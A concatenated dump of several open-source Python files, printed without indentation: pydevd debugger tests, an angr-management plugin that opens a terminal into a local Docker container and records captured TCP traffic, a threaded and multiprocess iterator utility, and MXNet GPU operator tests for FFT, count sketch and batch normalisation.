writer.write_add_exception_breakpoint_with_policy(
'RuntimeError',
notify_on_handled_exceptions=2, # Notify only once
notify_on_unhandled_exceptions=0,
ignore_libraries=0
)
elif scenario == 'handled_multiple':
writer.write_add_exception_breakpoint_with_policy(
'RuntimeError',
notify_on_handled_exceptions=1, # Notify multiple times
notify_on_unhandled_exceptions=0,
ignore_libraries=0
)
elif scenario == 'unhandled':
writer.write_add_exception_breakpoint_with_policy(
'RuntimeError',
notify_on_handled_exceptions=0,
notify_on_unhandled_exceptions=1,
ignore_libraries=0
)
writer.write_make_initial_run()
for _i in range(3 if scenario == 'handled_multiple' else 1):
hit = writer.wait_for_breakpoint_hit(
REASON_UNCAUGHT_EXCEPTION if scenario == 'unhandled' else REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_exception_on_filtered_file(case_setup):
def get_environ(writer):
env = os.environ.copy()
env.update({'PYDEVD_FILTERS': json.dumps({'**/other.py': True})})
return env
def check_test_suceeded_msg(writer, stdout, stderr):
return 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
if 'raise RuntimeError' not in stderr:
raise AssertionError('Expected test to have an unhandled exception.\nstdout:\n%s\n\nstderr:\n%s' % (
stdout, stderr))
with case_setup.test_file(
'my_code/my_code_exception_on_other.py',
get_environ=get_environ,
EXPECTED_RETURNCODE='any',
check_test_suceeded_msg=check_test_suceeded_msg,
additional_output_checks=additional_output_checks,
) as writer:
writer.write_add_exception_breakpoint_with_policy(
'RuntimeError',
notify_on_handled_exceptions=2, # Notify only once
notify_on_unhandled_exceptions=1,
ignore_libraries=0
)
writer.write_make_initial_run()
writer.finished_ok = True
@pytest.mark.parametrize("environ", [
{'PYDEVD_FILTER_LIBRARIES': '1'}, # Global setting for step over
{'PYDEVD_FILTERS': json.dumps({'**/other.py': True})}, # specify as json
    {'PYDEVD_FILTERS': '**/other.py'},  # specify as a ';'-separated list (a single glob here)
])
def test_step_over_my_code_global_settings(case_setup, environ, step_method):
def get_environ(writer):
env = os.environ.copy()
env.update(environ)
return env
def do_step():
if step_method == 'step_over':
writer.write_step_over(hit.thread_id)
return REASON_STEP_INTO # Note: goes from step over to step into
elif step_method == 'step_return':
writer.write_step_return(hit.thread_id)
return REASON_STEP_RETURN
else:
assert step_method == 'step_in'
writer.write_step_in(hit.thread_id)
return REASON_STEP_INTO
with case_setup.test_file('my_code/my_code.py', get_environ=get_environ) as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO)
assert hit.name == 'callback1'
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO)
assert hit.name == 'callback2'
stop_reason = do_step()
hit = writer.wait_for_breakpoint_hit(reason=stop_reason)
assert hit.name == 'callback1'
stop_reason = do_step()
hit = writer.wait_for_breakpoint_hit(reason=stop_reason)
assert hit.name == '<module>'
if IS_JYTHON:
            # Jython may get to exit functions, so just resume the thread.
writer.write_run_thread(hit.thread_id)
else:
stop_reason = do_step()
if step_method != 'step_return':
stop_reason = do_step()
if step_method == 'step_over':
stop_reason = REASON_STEP_OVER
hit = writer.wait_for_breakpoint_hit(reason=stop_reason)
assert hit.name == '<module>'
writer.write_step_over(hit.thread_id)
writer.finished_ok = True
def test_step_over_my_code_global_setting_and_explicit_include(case_setup):
def get_environ(writer):
env = os.environ.copy()
env.update({
'PYDEVD_FILTER_LIBRARIES': '1', # Global setting for in project or not
# specify as json (force include).
'PYDEVD_FILTERS': json.dumps({'**/other.py': False})
})
return env
with case_setup.test_file('my_code/my_code.py', get_environ=get_environ) as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO)
# Although we filtered out non-project files, other.py is explicitly included.
assert hit.name == 'call_me_back1'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_namedtuple(case_setup):
'''
Check that we don't step into <string> in the namedtuple constructor.
'''
with case_setup.test_file('_debugger_case_namedtuple.py') as writer:
line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
expected_line = line
for _ in range(2):
expected_line += 1
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_INTO, file='_debugger_case_namedtuple.py', line=expected_line)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_matplotlib_activation(case_setup):
try:
import matplotlib
except ImportError:
return
def get_environ(writer):
env = os.environ.copy()
env.update({
'IPYTHONENABLE': 'True',
})
return env
with case_setup.test_file('_debugger_case_matplotlib.py', get_environ=get_environ) as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
for _ in range(3):
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
# Jython needs some vars to be set locally.
# set JAVA_HOME=c:\bin\jdk1.8.0_172
# set PATH=%PATH%;C:\bin\jython2.7.0\bin
# set PATH=%PATH%;%JAVA_HOME%\bin
# c:\bin\jython2.7.0\bin\jython.exe -m py.test tests_python
if __name__ == '__main__':
pytest.main(['-k', 'test_unhandled_exceptions_in_top_level2'])
|
interaction_console.py
|
import threading
import archr
from PySide2.QtWidgets import QMainWindow, QMessageBox, QVBoxLayout
from PySide2.QtCore import Qt
from qtterm import TerminalWidget
from angrmanagement.plugins import BasePlugin
from angrmanagement.ui.views import BaseView
from angrmanagement.ui.views.interaction_view import (
SavedInteraction,
PlainTextProtocol,
)
class ConsoleView(BaseView):
"""
ConsoleView
"""
def __init__(self, target, *args, **kwargs):
self.target = target
super().__init__("interaction console", *args, **kwargs)
self.base_caption = "Interaction Console"
main_layout = QVBoxLayout()
main = QMainWindow()
terminal = TerminalWidget(
command=[
"docker",
"exec",
"-it",
self.target.companion_container.id,
"bash",
]
)
main.setWindowFlags(Qt.Widget)
main.setCentralWidget(terminal)
main_layout.addWidget(main)
self.setLayout(main_layout)
class InteractionConsole(BasePlugin):
"""
InteractionConsole Plugin
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.target = None
self.conversations = {}
img_name = self.workspace.instance.img_name
if img_name is None:
QMessageBox.critical(
None, "Nothing to run", "The project was not loaded from a docker image"
)
return
self.target = archr.targets.DockerImageTarget(img_name, companion=True)
self.target.build().start()
self.analyzer = archr.analyzers.TCPDumpAnalyzer(self.target)
self.interaction_context = self.analyzer.fire_context(timeout_exception=False)
self.interaction_context.__enter__()
threading.Thread(target=self._inotify_thread, daemon=True).start()
self.workspace.extract_conversations = self.analyzer.extract_conversations
self.console_view = ConsoleView(self.target, self.workspace, "center")
self.workspace.default_tabs += [self.console_view]
self.workspace.add_view(
self.console_view,
self.console_view.caption,
self.console_view.category,
)
def teardown(self):
if self.target:
self.target.__exit__()
def _inotify_thread(self):
inotify = self.target.run_companion_command(
[
"inotifywait",
"--monitor",
"--event",
"modify",
archr.analyzers.TCPDumpAnalyzer.pcap_path,
]
)
while True:
inotify.stdout.read(0x1000)
conversations = self.analyzer.extract_conversations()
for id_, conversation in conversations.items():
if id_ not in self.conversations:
self._save_interaction(conversation)
self.conversations = conversations
def _save_interaction(self, conversation):
target_port = self.target.tcp_ports[0]
def direction(srcport, dstport):
if srcport == target_port:
return "out"
if dstport == target_port:
return "in"
raise Exception("Unknown direction")
log = [
{
"dir": direction(srcport, dstport),
"data": payload,
}
for (srcport, dstport, payload) in conversation
]
name = hex(hash(str(conversation)) & 0xFFFFFFFFFFFFFFFF)[2:].rjust(16, "0")
self.workspace.instance.interactions.am_obj.append(
SavedInteraction(name, PlainTextProtocol, log)
)
self.workspace.instance.interactions.am_event()
|
iterators.py
|
import multiprocessing
import sys
import queue
import threading
import traceback
from typing import TypeVar, Iterable, Iterator, List, Callable
T = TypeVar('T')
__all__ = ['ThreadedIterator', 'MultiWorkerCallableIterator', 'BufferedIterator', 'DoubleBufferedIterator']
class ThreadedIterator(Iterator[T]):
"""An iterator object that computes its elements in a single parallel thread to be ready to be consumed.
The iterator should *not* return `None`. Elements of the original iterable will be shuffled arbitrarily."""
def __init__(self, original_iterator: Iterator[T], max_queue_size: int=2, enabled: bool=True):
self.__is_enabled = enabled
if enabled:
self.__queue = queue.Queue(maxsize=max_queue_size)
self.__thread = threading.Thread(target=lambda: self.__worker(self.__queue, original_iterator))
self.__thread.start()
else:
self.__original_iterator = original_iterator
@staticmethod
    def __worker(queue: queue.Queue, original_iterator: Iterator[T]) -> None:
try:
for element in original_iterator:
assert element is not None, 'By convention, Iterables wrapped in ThreadedIterator may not contain None.'
queue.put(element, block=True)
queue.put(None, block=True)
except Exception as e:
_, __, tb = sys.exc_info()
queue.put((e, tb), block=True)
def __next__(self) -> T:
next_element = self.__queue.get(block=True)
if next_element is None:
self.__thread.join()
self.__queue.put(None) # Make sure that we remember that we are done if we are called once more...
raise StopIteration
if isinstance(next_element, tuple) and isinstance(next_element[0], Exception):
raise next_element[0].with_traceback(next_element[1])
return next_element
def __iter__(self):
if self.__is_enabled:
return self
else:
return self.__original_iterator
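# Illustrative usage sketch for ThreadedIterator (added for clarity; not part of the original
# module's API, and the helper name below is hypothetical). It wraps an ordinary generator so
# that elements are pre-computed on a background thread while the consumer is busy.
def _threaded_iterator_example() -> List[int]:
    squares = (i * i for i in range(10))                 # any iterator that never yields None
    buffered = ThreadedIterator(squares, max_queue_size=4)
    return [element for element in buffered]             # consume elements as they become ready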
class MultiWorkerCallableIterator(Iterable):
"""An iterator that computes its elements in parallel workers to be ready to be consumed. The iterator should
have at least one element. The order of the callables is shuffled arbitrarily."""
def __init__(self, argument_iterator: Iterator[Iterable], worker_callable: Callable, max_queue_size: int=1, num_workers: int = 5, use_threads: bool=True):
self.__in_queue = queue.Queue() if use_threads else multiprocessing.Queue()
self.__num_elements = 0
for callable_args in argument_iterator:
self.__in_queue.put(callable_args)
self.__num_elements += 1
self.__out_queue = queue.Queue(maxsize=max_queue_size) if use_threads else multiprocessing.Queue(
maxsize=max_queue_size
)
self.__threads = [
threading.Thread(target=lambda: self.__worker(worker_callable)) if use_threads
else multiprocessing.Process(target=lambda: self.__worker(worker_callable)) for _ in range(num_workers)
]
for worker in self.__threads:
worker.start()
def __worker(self, worker_callable):
try:
while not self.__in_queue.empty():
next_element = self.__in_queue.get(block=False)
result = worker_callable(*next_element)
self.__out_queue.put(result)
except queue.Empty:
pass
except Exception as e:
_, __, tb = sys.exc_info()
self.__out_queue.put((e, tb), block=True)
def __iter__(self):
for _ in range(self.__num_elements):
next_element = self.__out_queue.get(block=True)
if isinstance(next_element, tuple) and isinstance(next_element[0], Exception):
raise next_element[0].with_traceback(next_element[1])
yield next_element
for worker in self.__threads:
worker.join()
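# Illustrative usage sketch for MultiWorkerCallableIterator (added for clarity; not part of the
# original module's API, helper name hypothetical). Each element of the argument iterator is an
# argument tuple applied to the callable by one of the workers; completion order is arbitrary.
def _multi_worker_example() -> List[int]:
    argument_tuples = ((i,) for i in range(8))           # one argument tuple per call
    results = MultiWorkerCallableIterator(argument_tuples, worker_callable=lambda x: x * x,
                                          num_workers=4, use_threads=True)
    return sorted(results)                               # sort because completion order is arbitrary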
class BufferedIterator(Iterable[T]):
"""An iterator object that computes its elements in a parallel process, ready to be consumed.
The iterator should *not* return None"""
def __init__(self, original_iterator: Iterator[T], max_queue_size: int=3, enabled: bool=True):
self.__original_iterator = original_iterator
self.__is_enabled = enabled
if enabled:
self.__buffer = multiprocessing.Queue(maxsize=max_queue_size)
self.__worker_process = multiprocessing.Process(target=lambda: self.__worker(original_iterator))
self.__worker_process.start()
def __worker(self, original_iterator: Iterator[T]) -> None:
"""Implementation of worker thread. Iterates over the original iterator, pulling results
and putting them into a buffer."""
try:
for element in original_iterator:
assert element is not None, 'By convention, iterator elements must not be None'
self.__buffer.put(element, block=True)
self.__buffer.put(None, block=True)
except Exception as e:
_, __, tb = sys.exc_info()
self.__buffer.put((e, tb), block=True)
def __iter__(self):
if not self.__is_enabled:
yield from self.__original_iterator
return
next_element = self.__buffer.get(block=True)
while next_element is not None:
if isinstance(next_element, tuple) and isinstance(next_element[0], Exception):
raise next_element[0].with_traceback(next_element[1])
yield next_element
next_element = self.__buffer.get(block=True)
self.__worker_process.join()
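# Illustrative usage sketch for BufferedIterator (added for clarity; not part of the original
# module's API, helper name hypothetical). Assumes a 'fork' multiprocessing start method, since
# the worker process above is created with a lambda target, which cannot be pickled under 'spawn'.
def _buffered_iterator_example() -> List[int]:
    doubled = (2 * i for i in range(5))                  # stand-in for an expensive producer
    return [element for element in BufferedIterator(doubled)]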
class DoubleBufferedIterator(Iterator[T]):
"""An iterator object that wraps double buffering around an iterable sequence.
This avoids waits in downstream applications if each step of the inner iterable can take a long while,
as the Queue used in (Single)BufferedIterator requires consumer and producer to synchronize.
Note: The inner iterable should *not* return None"""
def __init__(self, original_iterable: Iterable[T], max_queue_size_inner: int=20, max_queue_size_outer: int=5):
self.__buffer_inner = multiprocessing.Queue(maxsize=max_queue_size_inner)
self.__buffer_outer = multiprocessing.Queue(maxsize=max_queue_size_outer)
self.__worker_process_inner = multiprocessing.Process(target=lambda: self.__worker_inner(original_iterable))
self.__worker_process_outer = multiprocessing.Process(target=lambda: self.__worker_outer())
self.__worker_process_inner.start()
self.__worker_process_outer.start()
def __worker_inner(self, original_iterator: Iterable[T]) -> None:
"""Consumes elements from the original iterator, putting them into an inner buffer."""
try:
for element in original_iterator:
assert element is not None, 'By convention, iterator elements must not be None'
self.__buffer_inner.put(element, block=True)
self.__buffer_inner.put(None, block=True)
except Exception as e:
_, __, tb = sys.exc_info()
print("!!! Exception '%s' in inner worker of DoubleBufferedIterator:\n %s" % (e, "".join(
traceback.format_tb(tb)
)))
self.__buffer_inner.put((e, tb), block=True)
def __worker_outer(self) -> None:
"""Consumes elements from the inner worker and just passes them through to the outer buffer."""
try:
next_element = self.__buffer_inner.get(block=True)
while next_element is not None:
self.__buffer_outer.put(next_element, block=True)
next_element = self.__buffer_inner.get(block=True)
self.__buffer_outer.put(next_element, block=True)
except Exception as e:
_, __, tb = sys.exc_info()
print("!!! Exception '%s' in outer worker of DoubleBufferedIterator:\n %s" % (
e, "".join(traceback.format_tb(tb))
))
self.__buffer_outer.put((e, tb), block=True)
def __iter__(self):
return self
def __next__(self):
next_element = self.__buffer_outer.get(block=True)
if isinstance(next_element, tuple) and isinstance(next_element[0], Exception):
raise next_element[0].with_traceback(next_element[1])
elif next_element is None:
self.__worker_process_inner.join()
self.__worker_process_outer.join()
raise StopIteration
return next_element
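# Illustrative usage sketch for DoubleBufferedIterator (added for clarity; not part of the
# original module's API, helper name hypothetical). Same 'fork' start-method assumption as
# BufferedIterator above, since both worker processes are created with lambda targets.
def _double_buffered_iterator_example() -> List[str]:
    lines = (('line %d' % i) for i in range(5))          # stand-in for a slow line producer
    return [line for line in DoubleBufferedIterator(lines)]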
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import unittest
import mxnet as mx
import numpy as np
from nose.tools import assert_raises
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal
from mxnet.base import MXNetError
from mxnet import autograd
from numpy.testing import assert_allclose
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed, teardown, assert_raises_cudnn_disabled
from test_operator import *
from test_optimizer import *
from test_random import *
from test_exc_handling import *
#from test_rnn import *
from test_sparse_ndarray import *
from test_sparse_operator import *
from test_ndarray import *
set_default_context(mx.gpu(0))
del test_support_vector_machine_l1_svm # noqa
del test_support_vector_machine_l2_svm # noqa
def check_countsketch(in_dim,out_dim,n):
data = mx.sym.Variable("data")
h = mx.sym.Variable("h")
s = mx.sym.Variable("s")
sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
locations = {"data": x, "h": h, "s": s}
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
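# Illustrative, vectorized reference of the count-sketch projection exercised above (added for
# clarity; it mirrors the dense loops in check_countsketch and is not called by any test, and
# the helper name is hypothetical). For each row n: a[n, h[i]] += s[i] * x[n, i], where h is the
# bucket hash and s the sign hash, both of shape (1, in_dim).
def _countsketch_reference(x, h, s, out_dim):
    n, in_dim = x.shape
    a = np.zeros((n, out_dim))
    for i in range(in_dim):
        a[:, int(h[0, i])] += s[0, i] * x[:, i]          # accumulate signed values per bucket
    return a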
@with_seed()
def test_countsketch():
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1, maxn)
check_countsketch(in_dim, out_dim, n)
def check_ifft(shape):
shape_old = shape
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1]*2)
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1],shape[2],shape[3]*2)
sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
if len(shape) == 2:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[1]):
init_complex.real[:,i] = init[0][:,2*i]
init_complex.imag[:,i] = init[0][:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[3]):
init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[1]):
temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[3]):
temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
@with_seed()
def test_ifft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_ifft(shape)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0],rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[3],rtol=1e-3, atol=1e-5)
@with_seed()
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10087")
def test_batchnorm_with_type():
ctx_list_v1_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
]
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}}
]
# V1, 2D
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
check_consistency(sym, ctx_list_v1_2D)
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
check_consistency(sym, ctx_list_v1_2D)
# V2, 2D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
    # V2, 3D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNormV1 cpu
if 'batchnorm_v1_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNormV1 gpu (organic)
if 'batchnorm_v1_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
